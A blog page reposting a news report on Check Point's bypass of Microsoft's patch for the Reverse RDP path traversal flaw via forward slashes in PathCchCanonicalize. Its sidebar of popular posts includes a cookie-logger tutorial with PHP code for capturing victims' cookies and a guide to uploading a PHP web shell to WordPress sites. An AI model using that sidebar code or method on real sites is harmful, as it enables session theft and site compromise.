Skip to main content

Improper Microsoft Patch for Reverse RDP Attacks Leaves 3rd-Party RDP Clients Vulnerable

By
Reverse RDP Attacks

Remember the Reverse RDP Attack—wherein a client system vulnerable to a path traversal vulnerability could get compromised when remotely accessing a server over Microsoft's Remote Desktop Protocol?

Though Microsoft had patched the vulnerability (CVE-2019-0887) as part of its July 2019 Patch Tuesday update, it turns out researchers were able to bypass the patch just by replacing the backward slashes in paths with forward slashes.

Microsoft acknowledged the improper fix and re-patched the flaw in its February 2020 Patch Tuesday update earlier this year, now tracked as CVE-2020-0655.

In the latest report shared with The Hacker News, Check Point researcher disclosed that Microsoft addressed the issue by adding a separate workaround in Windows while leaving the root of the bypass issue, an API function "PathCchCanonicalize," unchanged.

 Apparently, the workaround works fine for the built-in RDP client in Windows operating systems, but the patch is not fool-proof enough to protect other third-party RDP clients against the same attack that relies on the vulnerable sanitization function developed by Microsoft.

"We found that not only can an attacker bypass Microsoft's patch, but they can bypass any canonicalization check that was done according to Microsoft's best practices," Check Point researcher Eyal Itkin said in a report shared with The Hacker News.

For those unaware, path traversal attacks occur when a program that accepts a file as input fails to verify it, allowing an attacker to save the file in any chosen location on the target system, and thus exposing the contents of files outside of the root directory of the application.

"A remote malware-infected computer could take over any client that tries to connect to it. For example, if an IT staff member tried to connect to a remote corporate computer that was infected by malware, the malware would be able to attack the IT staff member's computer as well," the researchers described.

The flaw came to light last year, and a subsequent research in August found that it impacted Microsoft's Hyper-V hardware virtualization platform as well.

Here's a demonstration video on the original vulnerability from the last year:


An Improperly Patched Path Traversal Flaw


According to researchers, the July patch can be bypassed because of a problem that lies in its path canonicalization function "PathCchCanonicalize," which is used to sanitize file paths, thus allowing a bad actor to exploit the clipboard synchronization between a client and a server to drop arbitrary files in arbitrary paths on the client machine.

In other words, when using the clipboard redirection feature while connected to a compromised RDP server, the server can use the shared RDP clipboard to send files to the client's computer and achieve remote code execution.
Although Check Point researchers originally confirmed that "the fix matches our initial expectations," it appears there's more to it than meets the eye: the patch can be simply bypassed by replacing backward slashes (e.g., file\to\location) in paths with forward slashes (e.g., file/to/location), which traditionally act as path separators in Unix-based systems.

"It seems that PathCchCanonicalize, the function that is mentioned in Windows's best practice guide on how to canonicalize a hostile path, ignored the forward-slash characters," Itkin said. "We verified this behavior by reverse-engineering Microsoft's implementation of the function, seeing that it splits the path to parts by searching only for '\' and ignoring '/.'"

Reverse RDP Attack

The cybersecurity firm said it found the flaw when trying to examine Microsoft's Remote Desktop client for Mac, an RDP client that was left out from their initial analysis last year. Interestingly, the macOS RDP client in itself isn't vulnerable to CVE-2019-0887.

With the main vulnerability still not rectified, Check Point cautioned that the implications of a simple bypass to a core Windows path sanitation function pose a serious risk to many other software products that could potentially be affected.

"Microsoft neglected to fix the vulnerability in their official API, and so all programs that were written according to Microsoft's best practices will still be vulnerable to a Path-Traversal attack," Check Point's Omri Herscovici said. "We want developers to be aware of this threat so that they could go over their programs and manually apply a patch against it."
Source: The Hacker News
Labels:

Comments

Post a Comment

Popular posts from this blog

Assembly Language Step-by-step: Programming with DOS and Linux-

By
(-Assembly Language Step-by-step: Programming with DOS and Linux-) The bestselling guide to assembly language-now updated and expanded to include coverage of Linux . This new edition of the bestselling guide to assembly programming now covers DOS and Linux! The Second Edition begins with a highly accessible overview of the internal operations of the Intel-based PC and systematically covers all the steps involved in writing, testing, and debugging assembly programs. Expert author Jeff Duntemann then presents working example programs for both the DOS and Linux operating systems using the popular free assembler NASM. He also includes valuable information on how to use procedures and macros, plus rare explanations of assembly-level coding for Linux, all of which combine to offer a comprehensive look at the complexities of assembly programming for Intel processors. Providing you with the foundation to create executable assembly language programs, this book: * Explains how to use NASM
Post a Comment
Read more

Cookie Logger

By
         Cookie Logger ---------------------------------------------- A Cookie Logger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim. Today I am going to show How to make your own Cookie Logger… Hope you will enjoy Reading it... STEP 1: Copy & Save the notepad file from below and Rename it as Fun.gif <a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a> STEP 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php $filename = “logfile.txt”; if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, ‘a’)) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } else { if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } } echo “Temporary
Post a Comment
Read more

Bypass while FTP login during wordpress shell uploads .

By
In this post I will be telling you how to bypass FTP login during wordpress shell upload. Sometimes when we are shelling a Wordpress website by uploading a theme in a zip file, it asks for ftp login information. This can be easily Bypassed using the below Method .  First of all, Log In to your target wordpress website, then in the left side, look for  Plugin option, click on it and select  Add New . There you will see a page titled  Install Plugins,  below it look for the option  Upload  and click on it After clicking on the Upload option, you will get a new page asking you to upload the plugin, browse your.php shell for there and click on Upload After the upload process is completed, you'll get the following Just skip this forum, and you are done xD ! Suppose the name of your shell was code.php, so inorder to access it goto http://www.website.com/wp-content/uploads/code.php
Post a Comment
Read more